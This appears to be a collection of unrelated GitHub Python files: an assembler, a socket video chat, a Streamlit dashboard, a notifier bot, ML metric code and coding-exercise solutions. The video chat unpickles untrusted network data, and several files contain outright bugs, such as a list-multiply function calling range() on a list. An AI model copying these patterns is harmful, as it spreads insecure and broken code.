readfile=\"Test.asm\"\r\n\r\n\r\nsplitfilename,extension = readfile.split('.')\r\nif (len(sys.argv)>2):\r\n outfile=(sys.argv[2])\r\nelse:\r\n outfile = \"Out\" + splitfilename + \".txt\"\r\n\r\n\r\nif os.path.isfile(readfile):\r\n try:\r\n os.remove(outfile)\r\n except:\r\n print(\"Error while deleting file \", outfile)\r\nelse:\r\n print(\"file not found or no file specified\")\r\n sys.exit()\r\n\r\ncount=0 \r\nfor line in list(open(readfile)): \r\n line=line.strip()\r\n # inline comments handling start\r\n try:\r\n if(line[0] != '#'):\r\n line,comment = line.split(\"#\")\r\n #print(\"found inline comment: \" + comment)\r\n line=line.strip()\r\n except:\r\n None\r\n #inline comments handling end\r\n try:\r\n line=int(line,16)\r\n line ='{0:032b}'.format(np.uint32(line))\r\n OutputAssembledLines[count] = line[16:]\r\n count +=1\r\n OutputAssembledLines[count] = line[:16]\r\n count +=1\r\n continue\r\n except :\r\n if (not line) or (line in ['\\n', '\\r\\n']) or line.upper()[0] == '#': # empty spaces, empty lines and comments check\r\n continue\r\n elif line.upper()[0] == '.':\r\n ORGcommand,addressVal = line.split(\" \")\r\n count=int(addressVal,16)\r\n continue\r\n \r\n elif line.upper() == \"NOP\" or line.upper() == \"RET\":\r\n if line.upper() == \"NOP\":\r\n OutputAssembledLines[count] = \"0000000000000000\"\r\n else:\r\n OutputAssembledLines[count] = \"1000000000000000\"\r\n count +=1\r\n continue\r\n try:\r\n instruction_name,operands = line.split(\" \",1)\r\n instruction_name = instruction_name.strip()\r\n operands=operands.strip()\r\n instruction_name = instruction_name.upper()\r\n except:\r\n if line.strip().isdigit():\r\n continue\r\n print(\"invalid line: \" + line)\r\n continue\r\n if (instruction_name == \"NOT\" or instruction_name == \"INC\" or instruction_name == \"DEC\"):\r\n tempStr = OP_Codes[instruction_name]+Registers[operands]+Registers[operands]\r\n OutputAssembledLines[count] = fix_length_16(tempStr)\r\n count +=1\r\n continue\r\n elif (instruction_name == \"IN\" or instruction_name == \"POP\" ):\r\n tempStr = OP_Codes[instruction_name]+Registers[operands]\r\n OutputAssembledLines[count] = fix_length_16(tempStr)\r\n count +=1\r\n continue\r\n elif (instruction_name == \"OUT\" or instruction_name == \"PUSH\" or instruction_name == \"JZ\" or instruction_name == \"JMP\" or instruction_name == \"CALL\"):\r\n tempStr = OP_Codes[instruction_name]+\"000\"+Registers[operands]\r\n OutputAssembledLines[count] = fix_length_16(tempStr)\r\n count +=1\r\n continue\r\n elif (instruction_name == \"SWAP\"):\r\n Rsrc,Rdst = operands.split(',')\r\n Rsrc = Rsrc.strip()\r\n Rdst = Rdst.strip()\r\n tempStr = OP_Codes[instruction_name]+Registers[Rdst]+Registers[Rdst]+Registers[Rsrc]\r\n OutputAssembledLines[count] = fix_length_16(tempStr)\r\n count +=1\r\n continue\r\n elif (instruction_name == \"AND\" or instruction_name == \"ADD\" or instruction_name == \"SUB\" or instruction_name == \"OR\"):\r\n Rsrc1,Rsrc2,Rdst = operands.split(',',2)\r\n Rsrc1=Rsrc1.strip()\r\n Rsrc2=Rsrc2.strip()\r\n Rdst=Rdst.strip()\r\n tempStr = OP_Codes[instruction_name]+Registers[Rdst]+Registers[Rsrc1]+Registers[Rsrc2]\r\n OutputAssembledLines[count] = fix_length_16(tempStr)\r\n count +=1\r\n continue\r\n elif (instruction_name == \"LDD\"):\r\n Rdst,EA = operands.split(',')\r\n Rdst=Rdst.strip()\r\n EA = EA.strip()\r\n EA = bin(int(EA,16))[2:]\r\n EA = left_fix_length_20(EA)\r\n tempStr = OP_Codes[instruction_name]+Registers[Rdst] +'000'+ EA[0:4]\r\n OutputAssembledLines[count] = tempStr\r\n count +=1\r\n OutputAssembledLines[count] = EA[4:]\r\n count +=1\r\n continue\r\n elif (instruction_name == \"STD\"):\r\n Rsrc,EA = operands.split(',')\r\n Rsrc=Rsrc.strip()\r\n EA = EA.strip()\r\n EA = bin(int(EA,16))[2:]\r\n EA = left_fix_length_20(EA)\r\n tempStr = OP_Codes[instruction_name]+'000'+Registers[Rsrc] + EA[0:4]\r\n OutputAssembledLines[count] = tempStr\r\n count +=1\r\n OutputAssembledLines[count] = EA[4:]\r\n count +=1\r\n continue\r\n elif (instruction_name == \"SHL\" or instruction_name == \"SHR\"):\r\n Rsrc,Imm = operands.split(',')\r\n Rsrc=Rsrc.strip()\r\n Imm=Imm.strip()\r\n Imm = int(Imm,16)\r\n Imm = '{0:016b}'.format(np.uint16(Imm))\r\n tempStr =OP_Codes[instruction_name]+Registers[Rsrc]+Registers[Rsrc]+Imm[0:4]\r\n OutputAssembledLines[count] = tempStr\r\n count +=1\r\n OutputAssembledLines[count] = Imm[4:]+\"0000\"\r\n count +=1\r\n continue\r\n elif (instruction_name == \"LDM\"):\r\n Rsrc,Imm = operands.split(',')\r\n Rsrc=Rsrc.strip()\r\n Imm=Imm.strip()\r\n Imm = int(Imm,16)\r\n Imm = '{0:016b}'.format(np.uint16(Imm))\r\n tempStr =OP_Codes[instruction_name]+Registers[Rsrc]+'000'+Imm[0:4]\r\n OutputAssembledLines[count] = tempStr\r\n count +=1\r\n OutputAssembledLines[count] = Imm[4:]+\"0000\"\r\n count +=1\r\n continue\r\n elif (instruction_name == \"IADD\"):\r\n Rsrc,Rdst,Imm = operands.split(',',2)\r\n Rsrc=Rsrc.strip()\r\n Rdst=Rdst.strip()\r\n Imm=Imm.strip()\r\n Imm = int(Imm,16)\r\n Imm = '{0:016b}'.format(np.uint16(Imm))\r\n tempStr =OP_Codes[instruction_name]+Registers[Rdst]+Registers[Rsrc]+Imm[0:4]\r\n OutputAssembledLines[count] = tempStr\r\n count +=1\r\n OutputAssembledLines[count] = Imm[4:]+\"0000\"\r\n count +=1\r\n continue\r\ntry:\r\n out = open(outfile, \"w\")\r\n maxval= max(OutputAssembledLines,key=int)+1 # to include final value\r\n for i in range(maxval):\r\n if i in OutputAssembledLines.keys():\r\n out.write(\"\\\"\"+str(OutputAssembledLines[i])+\"\\\"\"+\",\"+\"\\n\")\r\n else:\r\n out.write(\"\\\"\"+\"0000000000000000\"+\"\\\"\"+\",\"+\"\\n\") # fill out empty spaces in memory\r\n out.close()\r\nexcept:\r\n print(\"something went wrong during file write!\")\r\n out.close()","repo_name":"KhaledAmgad/-5-stage-pipelined-processor-Harvard-Architecture","sub_path":"AssemblerV2/AssemblerV2.py","file_name":"AssemblerV2.py","file_ext":"py","file_size_in_byte":8375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39580277142","text":"## TEST DATA\nimport cv2\nfrom scripts.Openpose.openpose_algorithm import run_openpose_algorithm\n\nnet_res_width = 512\nnet_res_height = 256\n\nresult_from_openpose = run_openpose_algorithm(net_res_width, net_res_height,\n '/Users/lucapomer/Documents/bachelor/YogaPoseDetection/experiments/Pose_Skeletons')\n\ni = 0\nfor item in result_from_openpose:\n cv2.imwrite('/Users/lucapomer/Documents/bachelor/YogaPoseDetection/experiments/result_skeletons/' + str(i) + '.jpg',\n item.output_img)\n i += 1\n","repo_name":"LucaPomer/YogaPoseDetection","sub_path":"scripts/helpers/write_openpose_skeletons.py","file_name":"write_openpose_skeletons.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"17232491609","text":"from client.protocols import protocol\nimport os\n\n\nclass FileContents(protocol.Protocol):\n \"\"\"The contents of changed source files are sent to the server.\"\"\"\n name = 'file_contents'\n\n def on_start(self):\n \"\"\"Find all source files and return their complete contents.\"\"\"\n contents = {}\n for path in self.assignment['src_files']:\n key = os.path.normpath(os.path.split(path)[1])\n with open(path, 'r', encoding='utf-8') as lines:\n value = lines.read()\n contents[key] = value\n return contents\n\n","repo_name":"dudduss/Ants","sub_path":"ok/client/protocols/file_contents.py","file_name":"file_contents.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3492012050","text":"def isprime(number):\n if number < 2:\n return False\n elif number == 2:\n return True\n else:\n for i in range(2, number):\n if number % i == 0:\n return False\n else:\n return True\n\n\nwhile True:\n n = input(\"(press q to quit)\\nEnter an integer: \")\n if n == \"q\":\n print(\"Exiting...\")\n break\n else:\n n = int(n)\n if isprime(n):\n print(\"{} is a prime number\".format(n))\n else:\n print(\"{} is not a prime number\".format(n))\n","repo_name":"yusufs-d/Python-Projects","sub_path":"prime_number.py","file_name":"prime_number.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40690004460","text":"import cv2\nimport socket\nimport pickle\nimport threading\n\nclass Transmitter(threading.Thread):\n def __init__(self,ip,port):\n threading.Thread.__init__(self) \n self.ip = ip\n self.port = port \n self.sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n self.sock.connect((ip,port))\n self.cam = cv2.VideoCapture(0)\n\n def run(self):\n while(True):\n try:\n self.ret , self.frame = self.cam.read() \n self.data = pickle.dumps(self.frame)\n self.sock.send(self.data)\n except:\n print(\" -> Broken Pipe ! \\n Exiting\")\n break\n \n def __del__(self):\n self.sock.close()\n self.cam.release()\n cv2.destroyAllWindows()\n\nclass Reciever(threading.Thread):\n def __init__(self,ip,port):\n threading.Thread.__init__(self)\n self.ip = ip \n self.port = port\n self.sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n self.sock.bind((ip,port))\n self.sock.listen(1)\n\n def run(self):\n self.conn , self.addr = self.sock.accept()\n print(\"Incoming Connection From{}\".format(self.addr))\n while(True):\n data = self.conn.recv(921781)\n try:\n frame = pickle.loads(data)\n cv2.imshow('Frame',frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n except:\n pass\n \n def __del__(self):\n self.conn.close()\n self.sock.close()\n cv2.destroyAllWindows()\n","repo_name":"HarshVaragiya/Chat-Application","sub_path":"VideoChat/DataStructure.py","file_name":"DataStructure.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"5650252850","text":"# Exercise 2: This program counts the distribution of the hour of the day\r\n# for each of the messages. You can pull the hour from the “From” line\r\n# by finding the time string and then splitting that string into parts using\r\n# the colon character. Once you have accumulated the counts for each\r\n# hour, print out the counts, one per line, sorted by hour \r\nfhand = open('dataFiles/data.txt')\r\nhourList=list()\r\nhourDict=dict()\r\nfor line in fhand:\r\n line=line.rstrip()\r\n if not line.startswith('From '): continue\r\n listLines=line.split()\r\n stringTime=listLines.pop(5)\r\n posColon=(stringTime.find(':'))\r\n hourList=(stringTime[:posColon].split())\r\n for hour in hourList:\r\n hourDict[hour]=hourDict.get(hour,0)+1\r\nhoursList=list()\r\nfor key,val in list(hourDict.items()):\r\n hoursList.append((val,key))\r\n hoursList.sort(reverse=False)\r\nfor val,key in hoursList:\r\n print(key,'th hour', val)\r\n","repo_name":"qamarabbas408/Python-4-Everybody","sub_path":"8tuples/Ex3_tuples8.py","file_name":"Ex3_tuples8.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33127281970","text":"import streamlit as st\r\nimport pandas as pd\r\ndf=pd.read_csv('startupfundcleaned.csv')\r\ndf['date']=pd.to_datetime(df['date'])\r\ndf['year']=df['date'].dt.year\r\ndf['month']=df['date'].dt.month\r\nprint(df.info())\r\nst.set_page_config(layout='wide',page_title='StartUp Analysis')\r\nst.sidebar.title('StartUp Analysis')\r\noption=st.sidebar.selectbox('select any one',('Overall Analysis','Start Up','Investor'))\r\ndef load_overall_analysis():\r\n st.title('Overall Analysis')\r\n # total invested amount\r\n total = round(df['amount'].sum())\r\n # max amount infused in a startup\r\n max_funding = df.groupby(['startup'])['amount'].max().sort_values(ascending=False).values[0]\r\n # avg ticket size\r\n avg_funding = df.groupby('startup')['amount'].sum().mean()\r\n # total funded startups\r\n num_startups = df['startup'].nunique()\r\n col1,col2,col3,col4=st.columns(4)\r\n with col1:\r\n st.metric('total',total)\r\n with col2:\r\n st.metric('Max', str(max_funding) + ' USD')\r\n with col3:\r\n st.metric('Avg',str(round(avg_funding)) + ' USD')\r\n with col4:\r\n st.metric('Funded Startups',num_startups)\r\n st.header('MOM investement')\r\n tab1, tab2= st.tabs([\"total\", \"max\"])\r\n with tab1:\r\n temp_df = df.groupby(['year', 'month'])['amount'].sum().reset_index()\r\n temp_df['x_axis'] = temp_df['month'].astype('str') + '-' + temp_df['year'].astype('str')\r\n st.line_chart(temp_df,x='x_axis',y='amount')\r\n with tab2:\r\n temp_df1= df.groupby(['year', 'month'])['amount'].max().reset_index()\r\n temp_df1['x_axis'] = temp_df['month'].astype('str') + '-' + temp_df['year'].astype('str')\r\n st.line_chart(temp_df1,x='x_axis',y='amount')\r\ndef loadinvestor(investor):\r\n st.title(investor)\r\n st.header('Recent Investments')\r\n st.dataframe(df[df['investors'].str.contains(investor)][['date','startup','vertical','city','round','amount']].head())\r\n st.header('Biggest investments')\r\n st.dataframe(df[df['investors'].str.contains(investor)].groupby(['startup'])['amount'].sum().head(1))\r\n tab1, tab2= st.tabs([\"sector\", \"YoY investment graph\"])\r\n with tab1:\r\n st.header(\"sector\")\r\n st.line_chart(df[df['investors'].str.contains(investor)].groupby(['vertical'])['amount'].sum())\r\n with tab2:\r\n st.header(\"YoY investment graph\")\r\n st.line_chart(df[df['investors'].str.contains(investor)].groupby(['year'])['amount'].sum())\r\ndef loadstartup(startup):\r\n st.title(startup)\r\nif option=='Overall Analysis':\r\n load_overall_analysis()\r\nelif option=='Start Up':\r\n st.title('Start Up Analysis')\r\n startup=st.sidebar.selectbox('Start Up',sorted(df['startup'].unique().tolist()))\r\n btn1=st.sidebar.button('Find Start Up Details')\r\n if btn1:\r\n loadstartup(startup)\r\nelif option=='Investor':\r\n st.title('Investor Analysis')\r\n investor=st.sidebar.selectbox('Investor',sorted(set(df['investors'].str.split(',').sum())))\r\n btn=st.sidebar.button('Find Investors Details')\r\n if btn:\r\n loadinvestor(investor)","repo_name":"venkateswararao10/streamlitproject","sub_path":"streamlitapp.py","file_name":"streamlitapp.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73383445034","text":"# write a python script to multiply all the number in a list\r\n\r\ndef multi(item):\r\n sum=1\r\n for i in range(item):\r\n sum=sum*i\r\n return sum\r\na=[5,8,6,4]\r\nprint(multi(a))\r\n\r\n\r\n\r\n","repo_name":"gauravaps/assignment-19","sub_path":"miltiply list in function.py","file_name":"miltiply list in function.py","file_ext":"py","file_size_in_byte":191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4216547228","text":"from abc import abstractmethod\nfrom typing import Optional, Type\n\nfrom psqlextra.backend.schema import PostgresSchemaEditor\nfrom psqlextra.models import PostgresPartitionedModel\n\n\nclass PostgresPartition:\n \"\"\"Base class for a PostgreSQL table partition.\"\"\"\n\n @abstractmethod\n def name(self) -> str:\n \"\"\"Generates/computes the name for this partition.\"\"\"\n\n @abstractmethod\n def create(\n self,\n model: Type[PostgresPartitionedModel],\n schema_editor: PostgresSchemaEditor,\n comment: Optional[str] = None,\n ) -> None:\n \"\"\"Creates this partition in the database.\"\"\"\n\n @abstractmethod\n def delete(\n self,\n model: Type[PostgresPartitionedModel],\n schema_editor: PostgresSchemaEditor,\n ) -> None:\n \"\"\"Deletes this partition from the database.\"\"\"\n\n def deconstruct(self) -> dict:\n \"\"\"Deconstructs this partition into a dict of attributes/fields.\"\"\"\n\n return {\"name\": self.name()}\n\n\n__all__ = [\"PostgresPartition\"]\n","repo_name":"SectorLabs/django-postgres-extra","sub_path":"psqlextra/partitioning/partition.py","file_name":"partition.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":647,"dataset":"github-code","pt":"72"} +{"seq_id":"10079975374","text":"from .SLFNet import SLFNet\n\nMODELS = {\n \"SLFNet\": SLFNet\n}\n\ndef get_model(name: str):\n \"\"\"Get backbone given the name\"\"\"\n if name not in MODELS.keys():\n raise ValueError(\n f\"Model {name} not in model list. Valid models are {MODELS.keys()}\"\n )\n return MODELS[name]","repo_name":"zhangyj85/SLFNet-A-Stereo-and-LiDAR-Fusion-Network-for-Depth-Completion","sub_path":"models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"18113221820","text":"import nextcord\r\nfrom nextcord.ext import commands\r\nfrom database import knotifier\r\nfrom config import token\r\nimport bato\r\nimport actions\r\nimport threading\r\nimport time\r\nimport re\r\n\r\nintents = nextcord.Intents.default()\r\nintents.message_content = True\r\n\r\nknotifier.initiate()\r\n\r\n# Define the function that runs the thread\r\ndef run_thread():\r\n while True:\r\n # Call your function\r\n actions.check_for_new()\r\n # Sleep for half an hour\r\n time.sleep(1800)\r\n\r\n# Create and start the thread\r\nthread = threading.Thread(target=run_thread)\r\nthread.start()\r\n\r\nbot = commands.Bot(command_prefix=\"/\", intents=intents)\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print(f\"Logged in as {bot.user.name} ({bot.user.id})\")\r\n print(\"------\")\r\n\r\n@bot.slash_command(name=\"track\", description=\"Tracks series chapters\")\r\nasync def addtrack(ctx, link: str):\r\n email = knotifier.db.get_email(ctx.user.id)\r\n telegram_chat_id = knotifier.db.get_telegram_chat_id(ctx.user.id)\r\n\r\n if email is None and telegram_chat_id is None:\r\n await ctx.send(\"Please set your email or Telegram channel ID first to receive notifications.\")\r\n return\r\n\r\n seriesId = None\r\n if '/series/' in link: # v2\r\n seriesId = link.split(\"/series/\")[1].split(\"/\")[0]\r\n elif '/title/' in link: # v3\r\n seriesId = link.split(\"/title/\")[1].split(\"/\")[0].split(\"-\")[0]\r\n elif link.isdigit():\r\n seriesId = int(link)\r\n if seriesId is None:\r\n await ctx.send(\"Invalid series link.\")\r\n return\r\n\r\n # Check if the series is already tracked for the user\r\n tracked_series = knotifier.db.get_tracked_series(ctx.user.id)\r\n if any(series[0] == seriesId for series in tracked_series):\r\n await ctx.send(\"This series is already being tracked.\")\r\n return\r\n\r\n title = bato.get_metadata(seriesId)\r\n if len(title) > 0 and type(title) == str:\r\n knotifier.db.track(ctx.user.id, seriesId, bato.get_chapters(seriesId), title)\r\n await ctx.send(f\"Now tracking {title}\")\r\n else:\r\n await ctx.send(\"Invalid series link\")\r\n\r\n@bot.slash_command(name=\"email\", description=\"Sets your email to recieve notifications\")\r\nasync def setemail(ctx, email: str):\r\n pattern = r'^[\\w\\.-]+@[\\w\\.-]+\\.\\w+$'\r\n if re.match(pattern, email):\r\n if knotifier.db.save_email(ctx.user.id, email):\r\n await ctx.send(f\"Email set to {email}\")\r\n #TODO maybe verify'''\r\n else:\r\n await ctx.send(\"Invalid email\")\r\n\r\n@bot.slash_command(name=\"list\", description=\"Lists your tracked series\")\r\nasync def list(ctx,):\r\n s = knotifier.db.get_tracked_series(ctx.user.id)\r\n if s == [] or s is None:\r\n await ctx.send(\"You are not tracking any series\")\r\n return\r\n if s is not None:\r\n msg = \"\\n\"\r\n for series_id, friendly_name in s:\r\n print(f\"Series ID: {series_id}, Friendly Name: {friendly_name}\")\r\n msg += f\"`{friendly_name}` - \\n\"\r\n msg += \"\\n\"\r\n await ctx.send(f\"Tracking series: {msg}\")\r\n\r\n@bot.slash_command(name=\"telegram\", description=\"Sets your Telegram channel ID\")\r\nasync def settelegram(ctx, channel_id: str):\r\n if channel_id.isdigit():\r\n channel_id = int(channel_id)\r\n if knotifier.db.save_telegram_chat_id(ctx.user.id, channel_id):\r\n await ctx.send(f\"Telegram channel ID set to {channel_id}\")\r\n else:\r\n await ctx.send(\"Failed to set Telegram channel ID\")\r\n else:\r\n await ctx.send(\"Please provide a valid Telegram channel ID.\\nTo retrieve your Telegram channel ID, please use the Username to ID Bot\\n\")\r\n\r\nbot.run(token())\r\n","repo_name":"1x6/knotifier","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"43856500300","text":"import os\nimport cv2\nimport math3d as m3d\nimport math\nfrom scipy.spatial.transform import Rotation as R\nimport requests\nfrom tqdm import tqdm\n\ndef create_dir_not_exist(path):\n if not os.path.exists(path):\n os.makedirs(path)\n \ndef draw_circle(image, radius):\n \"\"\"Draw a circle at the center of the given image.\"\"\"\n h, w = image.shape[:2]\n center = (w // 2, h // 2)\n\n # Evaluate radius\n# radius = max(3, radius)\n inner_radius = radius\n cv2.circle(image, center, inner_radius, (255, 255, 255), -1)\n# cv2.circle(image, center, inner_radius, (0, 0, 0), 2)\n return image\n\n\ndef world_to_gripper_orn(pitch, roll, yaw):\n grip_rot = m3d.Transform()\n grip_rot.pos = (0,0,0)\n grip_rot.orient.rotate_yb(math.radians(roll)) # roll\n grip_rot.orient.rotate_xb(math.radians(pitch)) #pitch\n grip_rot.orient.rotate_zb(math.radians(yaw)) #yaw\n grip_matrix = grip_rot.get_matrix()\n robot_Orn = R.from_matrix(grip_matrix[:3,:3]).as_quat()\n return robot_Orn\n\ndef change_urdf_fingerlength(robot_path, tmp_z):\n #read input file\n fin = open(robot_path, \"rt\")\n #read file contents to string\n data = fin.readlines()\n # get z of joint _ short finger\n tmp = data[178].split(' ')\n #tmp_z, 0.02 向下?, -0.02,向上?\n tmp[7] = str(tmp_z)\n tmp = ' '.join(tmp)\n data[178] = tmp\n #close the input file\n fin.close()\n #open the input file in write mode\n fin = open(robot_path, \"wt\")\n #overrite the input file with the resulting data\n fin.writelines(data)\n #close the file\n fin.close()\n\n####################\n#download file from google drive\ndef download_file_from_google_drive(id, destination):\n URL = \"https://docs.google.com/uc?export=download\"\n\n session = requests.Session()\n\n response = session.get(URL, params = { 'id' : id }, stream = True)\n token = get_confirm_token(response)\n\n if token:\n params = { 'id' : id, 'confirm' : token }\n response = session.get(URL, params = params, stream = True)\n\n save_response_content(response, destination) \n\ndef get_confirm_token(response):\n for key, value in response.cookies.items():\n if key.startswith('download_warning'):\n return value\n\n return None\n\ndef save_response_content(response, destination):\n CHUNK_SIZE = 32768\n\n with open(destination, \"wb\") as f:\n for chunk in tqdm(response.iter_content(CHUNK_SIZE)):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n###################","repo_name":"HKUST-RML/Learning-to-Grasp-by-Digging","sub_path":"tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"15250717409","text":"#!/usr/bin/env python3\n\n\ndef tidy(N):\n return list(N) == sorted(N)\n\ndef solve(N):\n if N == '0':\n return ''\n if tidy(N) or len(N) <= 1:\n return N\n return solve(str(int(N[:-1]) - 1)) + '9'\n\nT = int(input())\n\nfor case_number in range(1, T+1):\n N = input() # a string\n print('Case #%d:' % case_number, solve(N))\n","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/CodeJamData/17/02/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"22267724981","text":"import torch\n\nclass MetricRUC:\n def __init__(self, name: str, classnum: int):\n self.name = name.upper()\n\n self.correct = 0\n self.total = 0\n self.target_num = torch.zeros((1, classnum))\n self.predict_num = torch.zeros((1, classnum))\n self.acc_num = torch.zeros((1, classnum))\n\n def update(self, netout, target):\n\n target = target.detach().cpu().long()\n netout = netout.detach().cpu()\n _, pred = torch.max(netout.data, 1)\n self.total += target.size(0)\n self.correct += pred.eq(target.data).cpu().sum()\n pre_mask = torch.zeros(netout.size()).scatter_(1, pred.view(-1, 1), 1.)\n self.predict_num += pre_mask.sum(0)\n tar_mask = torch.zeros(netout.size()).scatter_(1, target.view(-1, 1), 1.)\n self.target_num += tar_mask.sum(0)\n acc_mask = pre_mask * tar_mask\n self.acc_num += acc_mask.sum(0)\n\n def summary(self):\n recall = self.acc_num / self.target_num\n precision = self.acc_num / self.predict_num\n F1 = 2 * recall * precision / (recall + precision)\n accuracy = self.acc_num.sum(1) / self.target_num.sum(1)\n # 精度调整\n recall = (recall.numpy()[0] * 100).round(3)\n precision = (precision.numpy()[0] * 100).round(3)\n F1 = (F1.numpy()[0] * 100).round(3)\n accuracy = (accuracy.numpy()[0] * 100).round(3)\n\n print(f'-----------------------{self.name}-------------------------')\n print(f'{self.name} RECALL', \" \".join('%s' % id for id in recall))\n print(f'{self.name} PRECISION', \" \".join('%s' % id for id in precision))\n print(f'{self.name} F1', \" \".join('%s' % id for id in F1))\n print(f'{self.name} accuracy', accuracy)\n\n return recall, precision, accuracy, F1\n\n\n\n\ndef validate(net, validation_dataset, lossfn, local_rank):\n\n net.eval()\n\n result_dict = {}\n\n total_loss_p2 = 0.0\n total_loss_p5 = 0.0\n total_loss_p18 = 0.0\n\n summary_p2 = MetricRUC(name = 'p2', classnum=OUTPUT_SIZE//3)\n summary_p5 = MetricRUC(name = 'p5', classnum=OUTPUT_SIZE//3)\n summary_p18 = MetricRUC(name = 'p18', classnum=OUTPUT_SIZE//3)\n total_loss = 0\n with torch.no_grad():\n for x, y in validation_dataset:\n y_p2 = y[..., 0]\n y_p5 = y[..., 1]\n y_p18 = y[..., 2]\n h_p2, h_p5, h_p18 = net(x.permute(0, 2, 1).to(local_rank))\n\n loss_p2 = lossfn[0](h_p2, y_p2.to(local_rank).long())\n loss_p5 = lossfn[1](h_p5, y_p5.to(local_rank).long())\n loss_p18 = lossfn[2](h_p18, y_p18.to(local_rank).long())\n\n total_loss += (0.2 * loss_p2 + 0.35 * loss_p5 + 0.45 * loss_p18).item()\n\n total_loss_p2 += loss_p2.item()\n total_loss_p5 += loss_p5.item()\n total_loss_p18 += loss_p18.item()\n\n summary_p2.update(h_p2, y_p2)\n summary_p5.update(h_p2, y_p5)\n summary_p18.update(h_p2, y_p18)\n\n recall, precision, accuracy, F1 = summary_p2.summary()\n result_dict['total_loss'] = total_loss / len(validation_dataset)\n result_dict['p2'] = {'loss': loss_p2 / len(validation_dataset),\n 'recall': precision,\n 'precision': precision,\n 'accuracy': accuracy,\n 'F1': F1}\n recall, precision, accuracy, F1 = summary_p5.summary()\n result_dict['p5'] = {'loss': loss_p5 / len(validation_dataset),\n 'recall': precision,\n 'precision': precision,\n 'accuracy': accuracy,\n 'F1': F1}\n recall, precision, accuracy, F1 = summary_p18.summary()\n result_dict['p18'] = {'loss': loss_p18 / len(validation_dataset),\n 'recall': precision,\n 'precision': precision,\n 'accuracy': accuracy,\n 'F1': F1}\n return result_dict","repo_name":"xfx88/SGD-HFT-Intern","sub_path":"Projects/T0/CNN/train_dir_0/roc_auc_calculation.py","file_name":"roc_auc_calculation.py","file_ext":"py","file_size_in_byte":4049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13339203503","text":"'''You are given an integer array nums consisting of n elements, and an integer k.\r\n\r\nFind a contiguous subarray whose length is equal to k that has the maximum average value and return this value. Any answer with a calculation error less than 10-5 will be accepted.\r\n\r\n \r\n\r\nExample 1:\r\n\r\nInput: nums = [1,12,-5,-6,50,3], k = 4\r\nOutput: 12.75000\r\nExplanation: Maximum average is (12 - 5 - 6 + 50) / 4 = 51 / 4 = 12.75\r\nExample 2:\r\n\r\nInput: nums = [5], k = 1\r\nOutput: 5.00000\r\n \r\n\r\nConstraints:\r\n\r\nn == nums.length\r\n1 <= k <= n <= 105\r\n-104 <= nums[i] <= 104'''\r\n\r\n\r\nclass Solution(object):\r\n def findMaxAverage(self, nums, k):\r\n \"\"\"\r\n :type nums: List[int]\r\n :type k: int\r\n :rtype: float\r\n \"\"\"\r\n # Calculate the initial sum of the first k elements\r\n current_sum = sum(nums[:k])\r\n max_average = current_sum / float(k) # Initialize max_average with the average of the first subarray\r\n\r\n # Slide the window through the array\r\n for i in range(k, len(nums)):\r\n # Add the current element to the window sum\r\n current_sum += nums[i]\r\n # Remove the first element from the window sum\r\n current_sum -= nums[i - k]\r\n # Calculate the average of the current subarray\r\n current_average = current_sum / float(k)\r\n # Update max_average if the current_average is greater\r\n max_average = max(max_average, current_average)\r\n\r\n return max_average\r\n\r\n# Example usage\r\nnums = [1, 12, -5, -6, 50, 3]\r\nk = 4\r\nsolution = Solution()\r\nresult = solution.findMaxAverage(nums, k)\r\nprint(result)\r\n\r\n","repo_name":"PandaFlo/LeetCode","sub_path":"Python/findMaxAverage.py","file_name":"findMaxAverage.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9529746638","text":"N,M = map(int,input().split())\nlis1 = input().split()\ndict1 = {}\nfor elem in lis1:\n dict1[elem] = True\n\nlis2 = input().split()\nintersection_count = 0\nfor elem in lis2:\n if elem in dict1:\n intersection_count +=1\n \nans = N + M - intersection_count*2\nprint(ans)","repo_name":"feelgom/problem-solving","sub_path":"BOJ/BOJ1269_대칭차집합.py","file_name":"BOJ1269_대칭차집합.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1637098155","text":"# 분할 정복 위해 꼭 잘 풀어봐 mm이랑 같이 보기\n\n# 민코딩 29.5 - 4\n\n# 정렬\n# 선택, 삽입, 